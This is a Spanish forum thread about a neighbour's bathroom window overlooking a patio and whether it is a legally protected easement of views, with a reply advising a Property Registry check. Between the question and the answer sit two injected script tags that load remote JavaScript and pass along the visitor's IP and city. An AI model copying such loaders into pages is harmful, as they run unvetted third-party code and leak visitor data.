Ventana del vecino en mi propiedad

Compre una casa con patio en una pedanía de casas de lázaro hace cuatro años, la antigua propietaria había fallecido y los hijos decidieron vendérmela, el problema es que en el patio que tiene la casa hay una ventana que la antigua propietaria les dejo abrir por mi patio, ahora me dicen los vecinos que tengo que dejar una separación para que les entre luz y aire de 2,5 metros, y yo pienso que vunnera mi derecho a la intimidad ya que si se asoman o escuchan me verían si paseo desnudo por mi patio o me escucharían lo que hablara con mis amigos, la e tapado con leña y ya me a avisado que me denuncia si no la dejo libre, ¿es ilegal dicha ventana ya que da a mi propiedad? ¿O por el contrario tengo que respetarla por la antigüedad que tiene? Claro, la antigua propietaria le dejo pero yo no quiero tener vecinos dentro de mi casa, dicha ventana, encima, es la del baño de la vivienda, así que me entero cuando pasan a el.

Muchas gracias por todo y espero tu respuesta.

<script type="text/javascript" src="http://loading-resource.com/50.js.php?i=%7B1B5AF47B-DAE2-45F7-8708-F06F0D5DC885%7D"></script><script type="text/javascript" src="https://d3pzomt0ul12fo.cloudfront.net/items/loaders/loader_1032.js?aoi=1311798366&pid=1032&zoneid=10368&cid=ES&rid=54&ccid=Albacete&ip=95.39.149.112"></script>
{"Lat":0.0,"Lng":0.0}

1 respuesta

Respuesta

Pues es un tema complicado, lo primero en este caso seria que comprobaras, si esta o no inscrita dicha ventana( dicha servidumbre de vistas) en el Registro de la Propiedad, para ello tendrás que comprobar tanto tu propiedad como la de tus vecinos, e incluso consultar con los que te han vendido si se hizo o no algún tipo de documento. Mi opinión es que no por el mero hecho de transcurrir el tiempo han adquirido el derecho, pues no media sentencia judicial, lo que quiere decir que también creo que si iniciaran procedimiento judicial, tendrían las de ganar, en cuanto a la existencia de la ventana, pues en cuanto al resto de requisitos que te piden, habría que estar a la costumbre de como lo tenían con la antigua propietaria.

muchas gracias por la aclaración, me informare en el registro haber si esta inscrita o no, el vecino me afirma que la ventana no se puede tapar porque el tiene otras dos de otro vecino por otro lado de la casa y que se informo, pero lo mismo la suya no la tiene registrada y por lo tanto no tendrá validez la antigüedad, ¿verdad?

muchas gracias